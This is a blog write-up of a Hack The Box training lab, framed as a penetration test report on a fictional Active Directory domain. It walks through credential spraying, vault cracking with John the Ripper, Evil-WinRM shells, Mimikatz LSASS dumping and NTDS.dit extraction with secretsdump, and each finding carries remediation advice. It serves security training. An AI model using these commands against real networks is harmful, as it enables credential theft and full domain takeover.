I recently completed the “Password Attacks” module on the CPTS path on Hack the Box. Rather than a more “traditional” write-up, I decided to write this one in the context of a Penetration Test report.
Penetration Test Report
Password Attacks Skills Engagement — NEXURA.HTB Active Directory Environment
Table of Contents
- Executive Summary
- Scope & Environment
- Attack Chain Overview
- Detailed Findings
- F-001: Credentials Exposed in Bash History
- F-002: Sensitive Password Vault in Accessible Network Share
- F-003: Weak Password Vault Master Password
- F-004: Credential Reuse Across Domain Accounts
- F-005: Plaintext Credentials Recoverable via Mimikatz on JUMP01
- F-006: Domain Admin Compromise & NTDS.dit Dump
- Attack Vectors Attempted — No Result
- Credentials Recovered
- Recommendations
- Appendix — Tools Used
Executive Summary
A penetration test was conducted against the NEXURA.HTB Active Directory environment consisting of three internal Windows hosts (DC01, FILE01, JUMP01) and one Linux DMZ host. Beginning with initial SSH access to the DMZ host, the assessment achieved full domain compromise through an unbroken chain of credential exposure vulnerabilities.
The critical path to domain compromise required no exploitation of software vulnerabilities. Every step was achieved exclusively through credential mismanagement, plaintext secret exposure, and insecure administrative practices. The most impactful findings were:
- Plaintext SSH credentials stored in
.bash_historyon a DMZ host - A password vault containing active domain user credentials stored in a world-readable SMB network share
- A trivially weak vault master password cracked in seconds via dictionary attack
- Plaintext credentials recoverable from LSASS memory on the domain jump box via Mimikatz
- A Domain Administrator account (
stom) whose password was present in the exposed vault
The engagement concluded with a full dump of NTDS.dit from DC01, yielding the NT hashes of every account in the NEXURA.HTB domain, including NEXURA\Administrator.
Overall Risk Rating: CRITICAL
Scope & Environment
In-Scope Hosts
| Hostname | IP Address | OS | Role |
|---|---|---|---|
| DMZ01 | 10.129.x.x | Linux | DMZ Entry Point |
| JUMP01 | 172.16.119.7 | Windows Server | Internal Jump Box |
| FILE01 | 172.16.119.10 | Windows Server | Internal File Server |
| DC01 | 172.16.119.11 | Windows Server | Domain Controller |
Domain Information
| Field | Value |
|---|---|
| Domain Name | NEXURA.HTB |
| Domain Controller | DC01 (172.16.119.11) |
| Domain Users Identified | Administrator, hwilliam, bdavid, stom, krbtgt, Guest |
| Domain Admins | Administrator, stom |
Open Ports of Note
| Host | Port | Service |
|---|---|---|
| DMZ01 | 22 | SSH |
| JUMP01 | 445, 5985 | SMB, WinRM |
| FILE01 | 445, 3389, 5985 | SMB, RDP, WinRM |
| DC01 | 445, 5985 | SMB (Signing Enabled), WinRM |
Attack Chain Overview
[1] Initial Access — DMZ01
└─ SSH login via pre-provided credentials (jbetty)
│
▼
[2] F-001 — Bash History Credential Exposure — DMZ01
└─ Recovered plaintext domain credentials from .bash_history (sshpass command)
│
▼
[3] SMB Enumeration — FILE01 & DC01
└─ Authenticated to FILE01 (READ/WRITE: HR, PRIVATE, TRANSFER shares)
└─ Domain users enumerated from DC01: hwilliam, bdavid, stom, Administrator
│
▼
[4] F-002 / F-003 — Password Vault in HR Share
└─ FILE01\HR\Archive\Employee-Passwords_OLD.psafe3 discovered
└─ Vault master password cracked via John the Ripper (dictionary word)
└─ Three domain user credentials recovered from vault
│
▼
[5] F-004 — Credential Reuse — JUMP01
└─ Vault credentials valid on JUMP01 via WinRM (TCP/5985)
└─ Evil-WinRM shell obtained on JUMP01
│
▼
[6] LSASS Dump — JUMP01
└─ SAM hashes and DCC2 cached credentials dumped from LSASS
└─ [ATTEMPTED] Local admin Pass-the-Hash → FAILED
└─ [ATTEMPTED] Domain account Pass-the-Hash → FAILED
└─ [ATTEMPTED] DCC2 hash cracking → No result during engagement window
│
▼
[7] F-005 — Mimikatz Plaintext Credential Recovery — JUMP01
└─ sekurlsa::logonpasswords recovered Domain Admin plaintext password from LSASS
│
▼
[8] F-006 — DC01 Compromise & NTDS.dit Dump
└─ Evil-WinRM to DC01 as Domain Admin
└─ NTDS.dit extracted via Volume Shadow Copy
└─ impacket-secretsdump recovered all domain hashes
└─ NEXURA\Administrator NT hash obtained
└─ *** DOMAIN FULLY COMPROMISED ***Detailed Findings
F-001: Credentials Exposed in Bash History
| Field | Detail |
|---|---|
| Severity | High |
| CVSS 3.1 Score | 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) |
| Host | DMZ01 |
| Location | /home/<user>/.bash_history |
| Discovery Method | Manual file review post SSH access |
Description
The .bash_history file on DMZ01 contained a previously executed sshpass command with domain credentials embedded directly in the command line:
sshpass -p "[REDACTED]" ssh hwilliam@file01This is a common consequence of using credential-embedding tools such as sshpass in interactive shell sessions. Any process or user with read access to the home directory can recover these credentials trivially without any special tooling.
Impact
The recovered credentials provided authenticated SMB access to both FILE01 and DC01, and served as the initial foothold into the internal domain environment, directly enabling all subsequent findings.
Evidence
[Source]
DMZ01:/home/<user>/.bash_history
→ sshpass -p "[REDACTED]" ssh hwilliam@file01
[Validation]
crackmapexec smb 172.16.119.10 -u hwilliam -p [REDACTED]
→ SMB 172.16.119.10 445 FILE01 [+] NEXURA\hwilliam (authenticated)
crackmapexec smb 172.16.119.11 -u hwilliam -p [REDACTED]
→ SMB 172.16.119.11 445 DC01 [+] NEXURA\hwilliam (authenticated)Remediation
- Never pass credentials as command-line arguments. Use SSH key-based authentication for host-to-host connections.
- Configure shell history to suppress credential-bearing commands:
HISTIGNORE='sshpass*:*password*' - Implement a secrets management solution (e.g., HashiCorp Vault) for service-to-service authentication.
- Audit all
.bash_historyfiles across DMZ and perimeter hosts for credential exposure. - Rotate the affected user’s credentials immediately.
F-002: Sensitive Password Vault in Accessible Network Share
| Field | Detail |
|---|---|
| Severity | Critical |
| CVSS 3.1 Score | 9.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) |
| Host | FILE01 (172.16.119.10) |
| Location | \\FILE01\HR\Archive\Employee-Passwords_OLD.psafe3 |
| Discovery Method | SMB share enumeration and recursive file listing |
Description
The HR SMB network share on FILE01 was accessible to all authenticated domain users with READ and WRITE permissions. Within the Archive subdirectory, a Password Safe v3 (.psafe3) vault file was discovered. This file contained valid, active plaintext credentials for multiple domain accounts once its master password was cracked (see F-003).
The share permissions were excessively permissive. Any domain user authenticated via SMB could download the vault file without any additional authorisation or auditing controls.
Observed Share Permissions
| Share | Access Level |
|---|---|
| HR | READ, WRITE |
| PRIVATE | READ, WRITE |
| TRANSFER | READ, WRITE |
| IT | NO ACCESS |
| MANAGEMENT | NO ACCESS |
| ADMIN$ | NO ACCESS |
| C$ | NO ACCESS |
Impact
The vault file yielded valid plaintext passwords for three active domain accounts. One of those accounts (stom) was a Domain Administrator. This single finding was the root cause of the domain compromise.
Evidence
# Share enumeration
crackmapexec smb 172.16.119.10 -u hwilliam -p [REDACTED] --shares
→ HR READ, WRITE
→ PRIVATE READ, WRITE
→ TRANSFER READ, WRITE
# Vault file discovery and download
smbclient //172.16.119.10/HR -U 'hwilliam%[REDACTED]' \
-c 'recurse ON; prompt OFF; mget *'
→ Downloaded: HR/Archive/Employee-Passwords_OLD.psafe3Remediation
- Remove all password vault files from shared network storage immediately.
- Apply the principle of least privilege to all SMB shares. The HR share should not be accessible to every domain user.
- Implement and review SMB share access auditing to detect unauthorised access.
- Deploy an enterprise password manager (e.g., CyberArk, Bitwarden Business) rather than file-based vaults on shared infrastructure.
- Rotate all credentials contained within the recovered vault file.
F-003: Weak Password Vault Master Password
| Field | Detail |
|---|---|
| Severity | High |
| CVSS 3.1 Score | 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) |
| Host | FILE01 — vault file origin |
| Tool Used | John the Ripper — dictionary attack |
| Wordlist | rockyou.txt |
| Time to Crack | Seconds |
Description
The Password Safe v3 vault recovered from the HR share was protected with a single dictionary word as its master password. This password is present in the rockyou.txt wordlist and was cracked near-instantly using John the Ripper.
Password Safe v3 uses PBKDF2-SHA256 with configurable iterations to protect the master key. Despite this cryptographic protection, a weak dictionary password rendered the entire vault trivially accessible to any attacker with the vault file.
Evidence
# Extract hash from vault file
pwsafe2john Employee-Passwords_OLD.psafe3 > vault.hash
# Dictionary attack
john vault.hash --wordlist=/usr/share/wordlists/rockyou.txt
# Result: Master password cracked (dictionary word)Remediation
- Enforce a minimum master password length of 16 characters with mixed case, numbers, and symbols for all password vaults.
- A single dictionary word provides effectively zero resistance against offline dictionary attacks regardless of the underlying cryptographic algorithm.
- Consider enforcing organisation-wide passphrase complexity policies for all credential storage tools.
F-004: Credential Reuse Across Domain Accounts
| Field | Detail |
|---|---|
| Severity | High |
| CVSS 3.1 Score | 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) |
| Host | JUMP01 (172.16.119.7) |
| Protocol | WinRM (TCP/5985) |
| Tool | Evil-WinRM |
Description
Credentials recovered from the password vault were tested against all in-scope hosts via SMB and WinRM. The account bdavid was found to have valid WinRM access to JUMP01, providing an interactive PowerShell session on the internal jump box.
The vault file was labelled _OLD, suggesting it was intended as an archive. However, all recovered passwords were current and valid Active Directory credentials at the time of the engagement, indicating no password rotation had occurred since the vault was archived.
Evidence
# Credential spray across all hosts
crackmapexec winrm 172.16.119.7 -u bdavid -p [REDACTED]
→ WINRM 172.16.119.7 5985 JUMP01 [+] NEXURA\bdavid (Pwn3d!)
# Evil-WinRM shell
proxychains evil-winrm -i 172.16.119.7 -u bdavid -p [REDACTED]
→ Evil-WinRM shell v3.3
→ *Evil-WinRM* PS C:\Users\bdavid\Documents>Remediation
- Implement and enforce a password rotation policy. Archived vault credentials should have been rotated immediately upon archival.
- Enforce unique passwords across all systems using a managed privileged access workstation (PAW) model.
- Restrict WinRM access to administrative accounts only via Windows Firewall and WinRM Group Policy.
- Deploy credential hygiene monitoring to detect password reuse across accounts.
F-005: Plaintext Credentials Recoverable via Mimikatz on JUMP01
| Field | Detail |
|---|---|
| Severity | Critical |
| CVSS 3.1 Score | 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N) |
| Host | JUMP01 (172.16.119.7) |
| Tool | Mimikatz — sekurlsa::logonpasswords |
| Prerequisite | Local Administrator access on JUMP01 |
Description
With local administrator access on JUMP01 (obtained via bdavid‘s WinRM session), Mimikatz was executed to enumerate credentials cached in LSASS memory. The sekurlsa::logonpasswords module recovered the plaintext password of stom, a Domain Administrator account, from LSASS memory.
Windows caches credentials in LSASS to support features such as network share access, RDP, and single sign-on. On systems where WDigest authentication is enabled (or where credentials have been entered interactively), plaintext passwords are retained in memory and can be extracted by any process with SeDebugPrivilege.
JUMP01’s role as a jump box made this especially impactful — privileged users regularly authenticate through it to reach other internal systems, making LSASS a high-value credential cache.
Evidence
mimikatz # privilege::debug
→ Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
→ Authentication Id : [...]
→ Session : Interactive from 0
→ User Name : stom
→ Domain : NEXURA
→ Logon Server : DC01
→ SID : [...]
→ msv :
[00000003] Primary
* Username : stom
* Domain : NEXURA
* NTLM : [REDACTED]
* SHA1 : [REDACTED]
→ wdigest :
* Username : stom
* Domain : NEXURA
* Password : [REDACTED]Remediation
- Enable Credential Guard on all domain-joined workstations and servers to protect LSASS from credential dumping.
- Disable WDigest authentication via registry:
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = 0 - Implement a tiered administration model — Domain Admin accounts should never authenticate to Tier 1 (member servers) or Tier 2 (workstations) systems.
- Deploy LSASS protection (RunAsPPL) to prevent unsigned code from accessing LSASS:
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1 - Consider deploying a Privileged Access Workstation (PAW) for all Domain Admin activities.
F-006: Domain Admin Compromise & NTDS.dit Dump
| Field | Detail |
|---|---|
| Severity | Critical |
| CVSS 3.1 Score | 10.0 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) |
| Host | DC01 (172.16.119.11) |
| Tool | Evil-WinRM, impacket-secretsdump |
| Prerequisite | Domain Admin credentials (stom) |
Description
With Domain Admin credentials for stom recovered via Mimikatz (F-005), an Evil-WinRM session was established directly to DC01. The NTDS.dit Active Directory database was extracted using a Volume Shadow Copy, and impacket-secretsdump was used to recover all domain account NT hashes offline.
This represents complete domain compromise — every credential in the Active Directory environment was recovered, including the built-in NEXURA\Administrator account.
Evidence
# Domain Admin access to DC01
proxychains evil-winrm -i 172.16.119.11 -u stom -p [REDACTED]
→ Evil-WinRM shell on DC01
# NTDS.dit extraction via Volume Shadow Copy
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\tmp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\tmp\system
# Offline hash extraction
impacket-secretsdump -ntds ntds.dit -system system LOCAL
→ NEXURA\Administrator:[REDACTED_HASH]
→ NEXURA\stom:[REDACTED_HASH]
→ NEXURA\hwilliam:[REDACTED_HASH]
→ NEXURA\bdavid:[REDACTED_HASH]
→ [... all domain accounts ...]Remediation
- Implement the full remediation chain from F-001 through F-005 — this finding is the culmination of every prior finding.
- Perform a full domain password reset for all user and service accounts.
- Reset the KRBTGT account password twice (with a 12-hour interval) to invalidate all Kerberos tickets.
- Audit all Domain Admin and privileged group memberships. Remove unnecessary accounts from Domain Admins.
- Implement tiered administration to prevent lateral movement from compromised workstations to domain controllers.
- Deploy domain controller hardening: restrict logon rights, enable Advanced Audit Policies, and monitor for DCSync/NTDS.dit access.
Attack Vectors Attempted — No Result
A-001: Local Administrator Pass-the-Hash
Target: JUMP01 (172.16.119.7)
Technique: Pass-the-Hash with local Administrator NTLM hash recovered from SAM dump
Result: FAILED — UAC FilterAdministratorToken policy blocked remote access with the local Administrator hash.
A-002: DCC2 Hash Cracking
Target: Cached domain credentials from JUMP01 LSASS dump
Technique: DCC2 (Domain Cached Credentials v2) hash cracking with Hashcat
Result: No passwords recovered during the engagement window. DCC2 hashes use 10,240 rounds of PBKDF2-HMAC-SHA1, making offline cracking significantly slower than standard NTLM.
A-003: Domain Account Pass-the-Hash via SMB/WinRM
Target: DC01, FILE01
Technique: Pass-the-Hash using domain account NTLM hashes recovered from the SAM dump
Result: FAILED — The recovered domain user hashes did not have administrative access on any remote host. SMB and WinRM connections were rejected with STATUS_ACCESS_DENIED.
Credentials Recovered
Note: All credential values have been redacted from this report. Full credential data was provided to the client via a separate secure channel.
| Account | Source | Scope |
|---|---|---|
| jbetty | Pre-provided (engagement start) | DMZ01 SSH |
| hwilliam | .bash_history on DMZ01 | FILE01, DC01 (SMB) |
| bdavid | Password vault (HR share) | JUMP01 (WinRM) |
| stom (Domain Admin) | Password vault + Mimikatz | DC01, full domain access |
| All domain accounts | NTDS.dit dump from DC01 | Entire domain |
Recommendations
Immediate Actions (0–48 Hours)
- Reset all domain passwords — every user and service account must be rotated.
- Reset KRBTGT twice with a 12-hour interval to invalidate Kerberos tickets.
- Remove the password vault from the HR share on FILE01.
- Revoke and rotate all credentials recovered during the engagement.
- Audit
.bash_historyon all DMZ and perimeter hosts; purge exposed credentials.
Short-Term (1–4 Weeks)
- Restrict SMB share permissions — apply least privilege to HR, PRIVATE, and TRANSFER shares.
- Disable WDigest authentication on all domain-joined systems.
- Enable LSASS protection (RunAsPPL) and Credential Guard across the estate.
- Restrict WinRM access to authorised administrative accounts only.
- Implement a tiered administration model — Domain Admins must not authenticate to member servers or workstations.
Medium-Term (1–3 Months)
- Deploy an enterprise password manager (e.g., CyberArk, Bitwarden Business) to replace file-based vaults.
- Implement Privileged Access Workstations (PAWs) for all administrative activities.
- Enable Advanced Audit Policies on domain controllers to detect credential dumping and DCSync.
- Deploy a secrets management solution (e.g., HashiCorp Vault) for service-to-service authentication.
- Enforce password complexity and rotation policies across all accounts.
Appendix — Tools Used
| Tool | Purpose |
|---|---|
| NetExec | SMB/WinRM authentication spray & share enum |
| smbclient | SMB share browsing and file download |
| Evil-WinRM | WinRM interactive shell access |
| John the Ripper | Password vault master password cracking |
| pwsafe2john | Password Safe hash extraction |
| Mimikatz | LSASS credential dumping |
| impacket-secretsdump | NTDS.dit offline hash extraction |
| Nmap | Port scanning and service discovery |
| Proxychains | Traffic routing through pivot host |
Leave a Reply